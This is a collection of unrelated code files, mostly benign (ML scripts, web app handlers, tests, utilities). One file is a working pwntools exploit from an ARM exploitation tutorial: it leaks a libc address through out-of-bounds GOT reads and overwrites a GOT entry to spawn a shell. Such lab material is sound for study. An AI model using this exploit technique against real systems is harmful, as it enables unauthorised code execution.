return self.token == blake3(token).hexdigest()
| StarcoderdataPython |
3356266 | #!/usr/bin/env python
# encoding: utf-8
# <NAME>, 2008
# <NAME>, 2008 (ita)
import TaskGen
from TaskGen import taskgen, feature
from Constants import *
TaskGen.declare_chain(
name = 'luac',
rule = '${LUAC} -s -o ${TGT} ${SRC}',
ext_in = '.lua',
ext_out = '.luac',
reentrant = False,
install = 'LUADIR', # env variable
)
@feature('lua')
def init_lua(self):
self.default_chmod = O755
def detect(conf):
conf.find_program('luac', var='LUAC', mandatory = True)
| StarcoderdataPython |
1741601 | from django.contrib import admin
from .models import Question, Option
admin.site.register(Question)
admin.site.register(Option)
| StarcoderdataPython |
62551 | import torch
import cv2 as cv
import numpy as np
from sklearn.neighbors import NearestNeighbors
from .model_utils import spread_feature
def optimize_image_mask(image_mask, sp_image, nK=4, th=1e-2):
mask_pts = image_mask.reshape(-1)
xyz_pts = sp_image.reshape(-1, 3)
xyz_pts = xyz_pts[mask_pts > 0.5, :]
Neighbors = NearestNeighbors(n_neighbors=nK + 1, algorithm='kd_tree').fit(xyz_pts)
nn_dist, nn_idx = Neighbors.kneighbors(xyz_pts) # N,nK
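    # the nearest neighbor of each point is the point itself (distance 0), so drop that first column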
nn_dist = nn_dist[:, 1:]
valid = (np.sum((nn_dist < th).astype(np.float), axis=1) == nK).astype(np.float)
optimized_mask = image_mask.reshape(-1)
optimized_mask[mask_pts > 0.5] = valid
optimized_mask = optimized_mask.reshape(image_mask.shape[0], image_mask.shape[1])
return optimized_mask
def generate_final_mask(image_learned_uv, image_mask,
image_resize_factor, mask_container_low_res, final_gim):
"""
Post Process Algorithm to generate mask of the unwrapped chart
Parameters
----------
image_learned_uv: [H,W,2]
image_mask: [H,W]
image_resize_factor: float
mask_container_low_res: a predefined tensor with intermediate low resolution
final_gim: a predefined tensor with target high resolution
"""
# resize (larger) rgb and uv with Bi-linear up-sampling
resized_uv = cv.resize(image_learned_uv, dsize=(image_resize_factor * image_learned_uv.shape[0],
image_resize_factor * image_learned_uv.shape[1]),
interpolation=cv.INTER_LINEAR)
resized_mask = cv.resize(image_mask, dsize=(image_resize_factor * image_learned_uv.shape[0],
image_resize_factor * image_learned_uv.shape[1]),
interpolation=cv.INTER_LINEAR)
resized_mask = (resized_mask > 0.5).astype(np.float)
# use gradient to remove the edge
discontinuous_mask_u = cv.Laplacian(image_learned_uv[..., 0], ddepth=cv.CV_32F) # small gradient map
discontinuous_mask_v = cv.Laplacian(image_learned_uv[..., 1], ddepth=cv.CV_32F) # small gradient map
    # use the max and min in latent u and v to find the threshold
u_max = (image_learned_uv[..., 0] * image_mask).max()
v_max = (image_learned_uv[..., 1] * image_mask).max()
u_min = (image_learned_uv[..., 0] * image_mask + (1.0 - image_mask)).min()
v_min = (image_learned_uv[..., 1] * image_mask + (1.0 - image_mask)).min()
u_th = (u_max - u_min) / 30
v_th = (v_max - v_min) / 30
discontinuous_mask_u = (discontinuous_mask_u > u_th).astype(np.float) * image_mask
discontinuous_mask_v = (discontinuous_mask_v > v_th).astype(np.float) * image_mask
discontinuous_mask = ((discontinuous_mask_u + discontinuous_mask_v) > 0).astype(np.float)
# use the mask to remove the boundary
boundary_recovery_mask = (cv.Laplacian(image_mask, ddepth=cv.CV_32F) > 0.01).astype(np.float)
discontinuous_mask = discontinuous_mask * (1.0 - boundary_recovery_mask)
resized_discontinuous_mask = cv.resize(discontinuous_mask,
dsize=(image_resize_factor * image_learned_uv.shape[0],
image_resize_factor * image_learned_uv.shape[1]),
interpolation=cv.INTER_NEAREST)
# make the small mask & texture
high_res_mask = torch.from_numpy(resized_mask * (1.0 - resized_discontinuous_mask)) \
.unsqueeze(0).unsqueeze(0).cuda().float() # 1,1,R,R
high_res_uv = torch.from_numpy(resized_uv).permute(2, 0, 1).unsqueeze(0).cuda().float()
low_res_mask = mask_container_low_res.cuda()
low_res_mask = spread_feature(low_res_mask, high_res_uv, high_res_mask, high_res_mask)
# use close to remove the holes in small mask and then resize
low_res_mask_closed = low_res_mask.detach().cpu().squeeze(0).squeeze(0).numpy() # R,R
close_k_size = int(final_gim.shape[2] / 100)
close_kernel = cv.getStructuringElement(cv.MORPH_ELLIPSE, (close_k_size, close_k_size))
final_mask_np = cv.resize(low_res_mask_closed, dsize=(final_gim.shape[2],
final_gim.shape[2]),
interpolation=cv.INTER_NEAREST) # R,R,3
final_mask_np = (final_mask_np > 0).astype(np.float)
final_mask_np = cv.morphologyEx(final_mask_np, cv.MORPH_OPEN, close_kernel)
return final_mask_np
def generate_texture(sp_image, full_gim, image_rgb, image_mask, final_mask_np, final_res, nK=4, th=1e-2):
# prepare root and query points form the image and from the high-res chart
root_xyz_np = sp_image.reshape(-1, 3) # H*W,3
root_rgb_np = image_rgb.reshape(-1, 3) # H*W,3
_image_mask = image_mask.reshape(-1) # H*W
root_xyz_np = root_xyz_np[_image_mask > 0.5, :] # M,2 [0,1]
root_rgb_np = root_rgb_np[_image_mask > 0.5, :] # M,3 [0,1]
query_xyz_np = full_gim.reshape(-1, 3) # R*R,3
_final_mask_np = final_mask_np.reshape(-1) # R*R
query_xyz_np = query_xyz_np[_final_mask_np > 0.5, :] # N,3 [0,1]
# finding nearest root pixel points
Neighbors = NearestNeighbors(n_neighbors=nK, algorithm='kd_tree').fit(root_xyz_np)
nn_dist, nn_idx = Neighbors.kneighbors(query_xyz_np) # N,nK
# optimize the gim mask
valid = (nn_dist[:, 0] < th).astype(np.float)
optimized_final_mask_np = final_mask_np.reshape(-1).copy()
optimized_final_mask_np[_final_mask_np > 0.5] = valid
optimized_final_mask_np = optimized_final_mask_np.reshape(final_mask_np.shape[0], final_mask_np.shape[1])
# do interpolation based on chart distance
interpolation_weight = nn_dist.copy()
interpolation_weight = 1 - interpolation_weight / np.sum(interpolation_weight, 1, keepdims=True)
interpolation_weight = interpolation_weight / np.sum(interpolation_weight, 1, keepdims=True)
query_rgb_np = np.zeros((query_xyz_np.shape[0], 3))
for kdx in range(nK):
nn_color = root_rgb_np[nn_idx[:, kdx], :]
query_rgb_np += nn_color * interpolation_weight[:, kdx][..., np.newaxis]
final_texture_np = np.ones((final_res ** 2, 3))
final_texture_np[_final_mask_np > 0.5, :] = query_rgb_np
final_texture_np = final_texture_np.reshape(final_res, final_res, 3)
return final_texture_np, optimized_final_mask_np | StarcoderdataPython |
18466 | """from django.contrib import admin
from .models import DemoModel
admin.site.register(DemoModel)"""
| StarcoderdataPython |
3387349 | class Solution:
def permuteUnique(self, nums: List[int]) -> List[List[int]]:
self.result = []
nums.sort()
visited = [False] * len(nums)
self.dfs(nums, [], visited)
return self.result
def dfs(self, nums, cur, visited):
if len(cur) == len(nums):
self.result.append(cur)
return
for i in range(len(nums)):
if i > 0 and nums[i] == nums[i - 1] and not visited[i - 1]:
continue
elif not visited[i]:
visited[i] = True
self.dfs(nums, cur + [nums[i]], visited)
visited[i] = False
return
| StarcoderdataPython |
178017 | <filename>interfaces/python/test/nodes_test.py
import ell
def test():
print("nodes_test.test -- TBD")
return 0
| StarcoderdataPython |
127208 | <filename>Episode3/exploits/exploit_got.py
#!/usr/bin/env python2
from pwn import *
ip = "192.168.0.13"
port = 22
user = "pi"
pwd = "<PASSWORD>"
libc = ELF('libc-2.24.so')
gadget_offset = 0xed748
shell = ssh(user, ip, password=pwd, port=port)
sh = shell.run('/home/pi/arm/episode3/got_overw')
# fill the array
sh.recvuntil('array:\n')
sh.sendline('1852400175') # "nib/"
sh.sendline('6845231') # "hs/"
for i in range(0,10):
sh.sendline(str(i))
sh.recvuntil('read: \n')
# Leak the libc address
sh.sendline('-9') # offset to the libc in the GOT section
ret = sh.recvline().split()
libc_main = int(ret[6])
# libc_base = libc_main - libc_base_offset
libc_base = libc_main - libc.symbols['__libc_start_main']
log.info('libcbase: %#x' % libc_base)
# address of the system function
system_addr = libc_base + libc.symbols['system']
log.info('system address: %#x' % system_addr)
sh.recvuntil('[y/n]\n')
# do not read other values
sh.sendline('n')
sh.recvuntil('modify?\n')
# send the system function address
sh.sendline(str(system_addr))
sh.recvuntil('modify\n')
sh.sendline('-10') # offset of the put in the GOT section
sh.recvuntil('value\n')
# gadget address
gadget_address = libc_base + gadget_offset
log.info('gadget address: %#x' % gadget_address)
# send the gadget address
sh.sendline(str(gadget_address))
sh.interactive()
shell.close()
| StarcoderdataPython |
1706177 | # The MIT License (MIT)
#
# Copyright (c) 2017 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from matplotlib import pyplot as plt
from collections import deque
from threading import Lock, Thread
import myo
import numpy as np
class EmgCollector(myo.DeviceListener):
"""
Collects EMG data in a queue with *n* maximum number of elements.
"""
def __init__(self, n):
self.n = n
self.lock = Lock()
self.emg_data_queue = deque(maxlen=n)
def get_emg_data(self):
with self.lock:
return list(self.emg_data_queue)
# myo.DeviceListener
def on_connected(self, event):
event.device.stream_emg(True)
def on_emg(self, event):
with self.lock:
self.emg_data_queue.append((event.timestamp, event.emg))
class Plot(object):
def __init__(self, listener):
self.n = listener.n
self.listener = listener
self.fig = plt.figure()
self.axes = [self.fig.add_subplot('81' + str(i)) for i in range(1, 9)]
[(ax.set_ylim([-100, 100])) for ax in self.axes]
self.graphs = [ax.plot(np.arange(self.n), np.zeros(self.n))[0] for ax in self.axes]
plt.ion()
def update_plot(self):
emg_data = self.listener.get_emg_data()
emg_data = np.array([x[1] for x in emg_data]).T
for g, data in zip(self.graphs, emg_data):
if len(data) < self.n:
# Fill the left side with zeroes.
data = np.concatenate([np.zeros(self.n - len(data)), data])
g.set_ydata(data)
plt.draw()
def main(self):
while True:
self.update_plot()
plt.pause(1.0 / 30)
def main():
### enter the path to your own MyoSDK package and .dll file here. Download
# with Nuget @ https://www.nuget.org/packages/MyoSDK/2.1.0 and insert .dll file within
# /bin folder if required.
myo.init(sdk_path="C:\\Users\\dicke\\packages\\MyoSDK.2.1.0")
hub = myo.Hub()
listener = EmgCollector(512)
with hub.run_in_background(listener.on_event):
Plot(listener).main()
if __name__ == '__main__':
main()
| StarcoderdataPython |
3248884 | <gh_stars>0
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.4.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression, LogisticRegression
from sklearn.tree import DecisionTreeClassifier as DTC
from sklearn.ensemble import ExtraTreesClassifier as ETC
from sklearn.ensemble import RandomForestClassifier as RDF
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.metrics import confusion_matrix, accuracy_score
# -
# ## Pre processing
# Based on the EDA (see notebook), data processing will be done below
# +
# import data
data_train = pd.read_csv('data/train.csv')
data_test = pd.read_csv('data/test.csv')
# Function to obtain information of null data (missing data)
def null_info(df):
num_null_val = df.isnull().sum()
p_null_val = 100*num_null_val/len(df)
null_info = pd.concat([num_null_val, p_null_val], axis=1)
null_info = null_info.rename(columns = {0: 'Counts of null', 1:'%'})
return null_info
data_train['Sex'] = data_train['Sex'].map({"male":0, "female":1})
data_test['Sex'] = data_test['Sex'].map({"male":0, "female":1})
data_train["Age"] = data_train["Age"].fillna(data_train["Age"].median())
data_test["Age"] = data_test["Age"].fillna(data_test["Age"].median())
data_train["Embarked"] = data_train["Embarked"].fillna("S")
data_test["Embarked"] = data_test["Embarked"].fillna("S")
# Replace strings in "Embarked" with 0 (S), 1 (C), 2 (Q)
data_train["Embarked"] = data_train["Embarked"].map({"S":0, "C":1, "Q":2})
data_test["Embarked"] = data_test["Embarked"].map({"S":0, "C":1, "Q":2})
data_test["Fare"] = data_test["Fare"].fillna(data_test["Fare"].median())
# -
PassengerId_test = np.array(data_test['PassengerId']).astype(int)
# ## Models
columns_train = ['Pclass','Sex','Age','Parch']
df_test = data_test[columns_train]
# ### Data for cross-validation
# data_train.columns
X = data_train[columns_train]
y = data_train[['Survived']]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=42)
# ### Linear Regression
X.columns
# #### Cross-validation
lm = LinearRegression()
lm.fit(X_train, y_train)
print(lm.intercept_)
lm.coef_
cdf = pd.DataFrame(lm.coef_,index=['Coeff'], columns=X.columns)
cdf
prediction = lm.predict(X_test)
res_predict = np.where(prediction>0.5, 1, 0)
accuracy_score(y_test, res_predict)
plt.scatter(y_test, prediction)
sns.distplot((y_test-prediction))
prediction_linR = lm.predict(df_test)
myPrediction_linR = pd.DataFrame(prediction_linR, PassengerId_test, columns=['Survived'])
myPrediction_linR['Survived'] = np.where(prediction_linR > 0.5, 1, 0)
myPrediction_linR.to_csv("results/Titianic_linR_model.csv", index_label = ["PassengerId"])
myPrediction_linR
# ### Decision tree
clf_DTC = DTC(max_depth=4)
clf_DTC.fit(X_train,y_train)
y_pred_test = clf_DTC.predict(X_test)
accuracy_score(y_test, y_pred_test)
# ### Logistic Regression
logi_regg = LogisticRegression()
clf_LogiReg = logi_regg.fit(X_train,y_train)
clf_LogiReg.coef_
clf_LogiReg.intercept_
y_pred_LogiReg = clf_LogiReg.predict(X_test)
accuracy_score(y_test, y_pred_LogiReg)
| StarcoderdataPython |
3338805 | import datetime
from apistar import App, Route, exceptions, types, validators
from apistar_jwt.token import JWT, JWTUser
# Fake user database
USERS_DB = {'id': 1, 'email': '<EMAIL>', 'password': 'password'}
class UserData(types.Type):
email = validators.String()
password = validators.String()
def welcome(user: JWTUser) -> dict:
message = f'Welcome {user.username}#{user.id}, your login expires at {user.token["exp"]}'
return {'message': message}
def login(data: UserData, jwt: JWT) -> dict:
# do some check with your database here to see if the user is authenticated
if data.email != USERS_DB['email'] or data.password != USERS_DB['password']:
raise exceptions.Forbidden('Incorrect username or password.')
payload = {
'id': USERS_DB['id'],
'username': USERS_DB['email'],
'iat': datetime.datetime.utcnow(),
'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=60) # ends in 60 minutes
}
token = jwt.encode(payload)
if token is None:
# encoding failed, handle error
raise exceptions.BadRequest()
return {'token': token}
routes = [
Route('/', method='GET', handler=welcome),
Route('/login', method='POST', handler=login),
]
components = [
JWT({
'JWT_SECRET': '<KEY>',
}),
]
app = App(routes=routes, components=components)
if __name__ == '__main__':
app.serve('127.0.0.1', 8080, use_debugger=True, use_reloader=True)
| StarcoderdataPython |
117571 | <reponame>spiralgenetics/biograph
# pylint: disable=missing-docstring
from __future__ import print_function
import unittest
import biograph
import biograph.variants as bgexvar
def vcf_assembly(pos, ref, alt, asm_id):
pos = int(pos)-1
if ref and alt and ref[0] == alt[0]:
ref = ref[1:]
alt = alt[1:]
pos = pos + 1
return bgexvar.Assembly(pos, pos + len(ref), alt, asm_id)
# Raises an error that F0705 21:53:28.427729 102440 read_cov.cpp:28] Check failed: !m_interior
asms = [vcf_assembly('17125234', 'A', 'G', 17125234),
vcf_assembly('17125346', 'T', 'C', 17125346),
vcf_assembly('17125438', 'A', 'C', 17125438),
vcf_assembly('17125626', 'A', 'C', 17125626)]
bg = biograph.BioGraph("/share/datasets/HG002/HG002-NA24385-50x.bg/", biograph.CacheStrategy.MMAP)
seqset = bg.seqset
rm = bg.open_readmap()
ref = biograph.Reference("/reference/hs37d5")
for pos,asm in enumerate(asms):
print(pos)
pc = list(bgexvar.generate_read_cov(rm, ref, "1", [asm]))
| StarcoderdataPython |
141728 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# ProDy: A Python Package for Protein Dynamics Analysis
#
# Copyright (C) 2010-2012 <NAME>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2010-2012 <NAME>'
from prody.tests import TestCase
from prody.utilities import rangeString
try:
range = xrange
except NameError:
pass
class TestRangeString(TestCase):
def testContinuous(self):
self.assertEqual(rangeString(list(range(10))), '0 to 9')
def testNegative(self):
self.assertEqual(rangeString(list(range(-5, 10)), pos=False),
'-5 to 9')
def testGapped(self):
self.assertEqual(rangeString(list(range(-5, 10)) +
list(range(15, 20)) +
list(range(25, 30)), pos=False),
'-5 to 9 15 to 19 25 to 29')
def testRepeated(self):
self.assertEqual(rangeString(list(range(10, 20)) +
list(range(15, 20)) +
list(range(30))), '0 to 29')
| StarcoderdataPython |
14788 | # -*- coding: utf-8 -*-
'''
:codeauthor: <NAME> <<EMAIL>>
'''
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
# Import Salt Testing Libs
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import TestCase
from tests.support.mock import (
MagicMock,
patch
)
# Import Salt Libs
import salt.utils.json
import salt.states.grafana as grafana
from salt.exceptions import SaltInvocationError
class GrafanaTestCase(TestCase, LoaderModuleMockMixin):
'''
Test cases for salt.states.grafana
'''
def setup_loader_modules(self):
return {grafana: {}}
# 'dashboard_present' function tests: 1
def test_dashboard_present(self):
'''
Test to ensure the grafana dashboard exists and is managed.
'''
name = 'myservice'
rows = ['systemhealth', 'requests', 'title']
row = [{'panels': [{'id': 'a'}], 'title': 'systemhealth'}]
ret = {'name': name,
'result': None,
'changes': {},
'comment': ''}
comt1 = ('Dashboard myservice is set to be updated. The following rows '
'set to be updated: {0}'.format(['systemhealth']))
self.assertRaises(SaltInvocationError, grafana.dashboard_present, name,
profile=False)
self.assertRaises(SaltInvocationError, grafana.dashboard_present, name,
True, True)
mock = MagicMock(side_effect=[{'hosts': True, 'index': False},
{'hosts': True, 'index': True},
{'hosts': True, 'index': True},
{'hosts': True, 'index': True},
{'hosts': True, 'index': True},
{'hosts': True, 'index': True},
{'hosts': True, 'index': True}])
mock_f = MagicMock(side_effect=[False, False, True, True, True, True])
mock_t = MagicMock(return_value='')
mock_i = MagicMock(return_value=False)
source = {'dashboard': '["rows", {"rows":["baz", null, 1.0, 2]}]'}
mock_dict = MagicMock(return_value={'_source': source})
with patch.dict(grafana.__salt__, {'config.option': mock,
'elasticsearch.exists': mock_f,
'pillar.get': mock_t,
'elasticsearch.get': mock_dict,
'elasticsearch.index': mock_i}):
self.assertRaises(SaltInvocationError, grafana.dashboard_present,
name)
with patch.dict(grafana.__opts__, {'test': True}):
self.assertRaises(SaltInvocationError, grafana.dashboard_present,
name)
comt = ('Dashboard {0} is set to be created.'.format(name))
ret.update({'comment': comt})
self.assertDictEqual(grafana.dashboard_present(name, True), ret)
mock = MagicMock(return_value={'rows':
[{'panels': 'b',
'title': 'systemhealth'}]})
with patch.object(salt.utils.json, 'loads', mock):
ret.update({'comment': comt1, 'result': None})
self.assertDictEqual(grafana.dashboard_present(name, True,
rows=row),
ret)
with patch.object(salt.utils.json, 'loads',
MagicMock(return_value={'rows': {}})):
self.assertRaises(SaltInvocationError,
grafana.dashboard_present, name,
rows_from_pillar=rows)
comt = ('Dashboard myservice is up to date')
ret.update({'comment': comt, 'result': True})
self.assertDictEqual(grafana.dashboard_present(name, True), ret)
mock = MagicMock(return_value={'rows': [{'panels': 'b',
'title': 'systemhealth'}]})
with patch.dict(grafana.__opts__, {'test': False}):
with patch.object(salt.utils.json, 'loads', mock):
comt = ('Failed to update dashboard myservice.')
ret.update({'comment': comt, 'result': False})
self.assertDictEqual(grafana.dashboard_present(name, True,
rows=row),
ret)
# 'dashboard_absent' function tests: 1
def test_dashboard_absent(self):
'''
Test to ensure the named grafana dashboard is deleted.
'''
name = 'myservice'
ret = {'name': name,
'result': None,
'changes': {},
'comment': ''}
mock = MagicMock(side_effect=[{'hosts': True, 'index': False},
{'hosts': True, 'index': True},
{'hosts': True, 'index': True}])
mock_f = MagicMock(side_effect=[True, False])
with patch.dict(grafana.__salt__, {'config.option': mock,
'elasticsearch.exists': mock_f}):
self.assertRaises(SaltInvocationError, grafana.dashboard_absent,
name)
with patch.dict(grafana.__opts__, {'test': True}):
comt = ('Dashboard myservice is set to be removed.')
ret.update({'comment': comt, 'result': None})
self.assertDictEqual(grafana.dashboard_absent(name), ret)
comt = ('Dashboard myservice does not exist.')
ret.update({'comment': comt, 'result': True})
self.assertDictEqual(grafana.dashboard_absent(name), ret)
| StarcoderdataPython |
3320835 | <filename>docs/source/conf.py
# -*- coding: utf-8 -*-
import sys
import os
sys.path.insert(0, os.path.abspath('../../'))
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.coverage',
]
templates_path = ['_templates']
source_suffix = '.rst'
source_encoding = 'utf-8-sig'
master_doc = 'index'
project = u'message-queue'
copyright = u'2016, Ingresse'
author = u'Ingresse'
version = u'0.1.1'
release = u'0.1.1'
language = None
exclude_patterns = []
pygments_style = 'sphinx'
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
html_theme = 'sphinx_rtd_theme'
html_static_path = ['_static']
htmlhelp_basename = 'message-queuedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {}
latex_documents = [
(master_doc, 'message-queue.tex', u'message-queue Documentation',
u'Ingresse', 'manual'),
]
# -- Options for manual page output ---------------------------------------
man_pages = [
(master_doc, 'message-queue', u'message-queue Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
texinfo_documents = [
(master_doc, 'message-queue', u'message-queue Documentation',
author, 'message-queue', 'Message Queue',
'Miscellaneous'),
]
intersphinx_mapping = {'https://docs.python.org/': None}
| StarcoderdataPython |
1631373 | <filename>app/database.py
import logging
import os
from typing import Optional
import sqlalchemy
from slack_sdk.oauth.installation_store import InstallationStore
from slack_sdk.oauth.installation_store.sqlalchemy import SQLAlchemyInstallationStore
from slack_sdk.oauth.state_store.sqlalchemy import SQLAlchemyOAuthStateStore
from sqlalchemy.engine import Engine
logger = logging.getLogger(__name__)
user_token = os.environ.get("SLACK_USER_TOKEN")
engine: Optional[Engine] = None
installation_store: Optional[InstallationStore] = None
client_id = os.environ["SLACK_CLIENT_ID"]
local_database_url = "sqlite:///local_dev.db"
database_url = os.environ.get("DATABASE_URL") or local_database_url
logger.info(f"database: {database_url}")
logging.getLogger("sqlalchemy.engine").setLevel(logging.DEBUG)
engine = sqlalchemy.create_engine(database_url)
installation_store = SQLAlchemyInstallationStore(
client_id=client_id,
engine=engine,
logger=logger,
)
oauth_state_store = SQLAlchemyOAuthStateStore(
expiration_seconds=120,
engine=engine,
logger=logger,
)
def run_db_migration():
try:
engine.execute("select count(*) from slack_bots")
except Exception as _:
installation_store.metadata.create_all(engine)
oauth_state_store.metadata.create_all(engine)
if database_url == local_database_url:
run_db_migration()
| StarcoderdataPython |
3337933 | <reponame>adarshd8127/Hacktoberfest-3
import numpy as np
import scipy.integrate as spi
def arc_length(f,a,b,h=0.001,N=1000):
'''Approximate the arc length of y=f(x) from x=a to x=b.
Parameters
----------
f : (vectorized) function of one variable
a,b : numbers defining the interval [a,b]
h : step size to use in difference formulas
N : number of subintervals in trapezoid method
Returns
-------
Approximation of the integral \int_a^b \sqrt{1 + (f'(x))^2} dx
representing the arc length of y=f(x) from x=a to x=b.
'''
x = np.linspace(a,b,N+1)
y = f(x)
# Compute central difference formula for x_k for 1 <= k <= N-1
h = np.min([h,(b-a)/N]) # Make sure that h is smaller than the size of the subintervals
x_interior = x[1:-1]
df_interior = (f(x_interior + h) - f(x_interior - h))/(2*h)
# Use forward/backward difference formula at the endpoints
df_a = (f(a + h) - f(a))/h
df_b = (f(b) - f(b - h))/h
df = np.hstack([[df_a],df_interior,[df_b]])
# Compute values of the integrand in arc length formula
y = np.sqrt(1 + df**2)
# Compute the integral
L = spi.trapz(y,x)
return L
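# Quick sanity check: the arc length of y = x on [0, 1] is sqrt(2), about 1.41421,
# so the call below should print approximately that value.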
print(arc_length(lambda x: x,0,1)) | StarcoderdataPython |
27 | ##########################################################################
#
# Copyright (c) 2010-2012, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import os
import sys
import shutil
import unittest
import IECore
class TestBasicPreset( unittest.TestCase ) :
def testCopy( self ) :
testObj = IECore.Parameterised( "testParameterised1" )
testObj.parameters().addParameters(
[
IECore.BoolParameter( "a", "", True ),
IECore.FloatParameter( "b", "", 1.0 ),
]
)
testObj2 = IECore.Parameterised( "testParameterised2" )
testObj2.parameters().addParameters(
[
IECore.BoolParameter( "a", "", False ),
IECore.FloatParameter( "c", "", 0.0 ),
]
)
p = IECore.BasicPreset( testObj, testObj.parameters() )
self.assertTrue( p.applicableTo( testObj, testObj.parameters() ) )
self.assertFalse( p.applicableTo( testObj2, testObj2.parameters() ) )
testObj.parameters()["a"].setTypedValue( False )
testObj.parameters()["b"].setTypedValue( 0.0 )
p( testObj, testObj.parameters() )
self.assertEqual( testObj.parameters()["a"].getTypedValue(), True )
self.assertEqual( testObj.parameters()["b"].getTypedValue(), 1.0 )
p2 = IECore.BasicPreset( testObj, testObj.parameters(), parameters=( testObj.parameters()["a"], ) )
self.assertTrue( p2.applicableTo( testObj, testObj.parameters() ) )
self.assertTrue( p2.applicableTo( testObj2, testObj.parameters() ) )
p2( testObj2, testObj2.parameters() )
self.assertEqual( testObj2.parameters()["a"].getTypedValue(), True )
self.assertEqual( testObj2.parameters()["c"].getTypedValue(), 0.0 )
def testLoad( self ) :
testObj = IECore.Parameterised( "testParameterised1" )
testObj.parameters().addParameters(
[
IECore.BoolParameter( "a", "", True ),
IECore.FloatParameter( "b", "", 1.0 ),
]
)
testObj2 = IECore.Parameterised( "testParameterised1" )
testObj2.parameters().addParameters(
[
IECore.BoolParameter( "a", "", False ),
IECore.FloatParameter( "c", "", 0.0 ),
]
)
savePath = os.path.abspath( os.path.join( os.path.dirname( __file__ ), "data", "basicPreset" ) )
messageHandler = IECore.CapturingMessageHandler()
with messageHandler :
p = IECore.BasicPreset( os.path.join( savePath, "basicPresetLoadTest", "basicPresetLoadTest-1.cob" ) )
self.assertEqual( len( messageHandler.messages ), 0 )
self.assertTrue( p.applicableTo( testObj, testObj.parameters() ) )
self.assertFalse( p.applicableTo( testObj2, testObj2.parameters() ) )
testObj.parameters()["a"].setTypedValue( False )
testObj.parameters()["b"].setTypedValue( 0.0 )
p( testObj, testObj.parameters() )
self.assertEqual( testObj.parameters()["a"].getTypedValue(), True )
self.assertEqual( testObj.parameters()["b"].getTypedValue(), 1.0 )
def testSave( self ) :
testObj = IECore.Parameterised( "testParameterised1" )
testObj.parameters().addParameters(
[
IECore.BoolParameter( "a", "", True ),
IECore.FloatParameter( "b", "", 1.0 ),
]
)
testObj2 = IECore.Parameterised( "testParameterised1" )
testObj2.parameters().addParameters(
[
IECore.BoolParameter( "a", "", False ),
IECore.FloatParameter( "c", "", 0.0 ),
]
)
savePath = os.path.abspath( os.path.join( os.path.dirname( __file__ ), "data", "basicPreset" ) )
preset = IECore.BasicPreset( testObj, testObj.parameters() )
# Save for the classLoader and check its there, we test the 'loadability' later...
preset.save( savePath, "basicPresetTest" )
self.assertTrue( os.path.isfile( os.path.join( savePath, "basicPresetTest", "basicPresetTest-1.cob" ) ) )
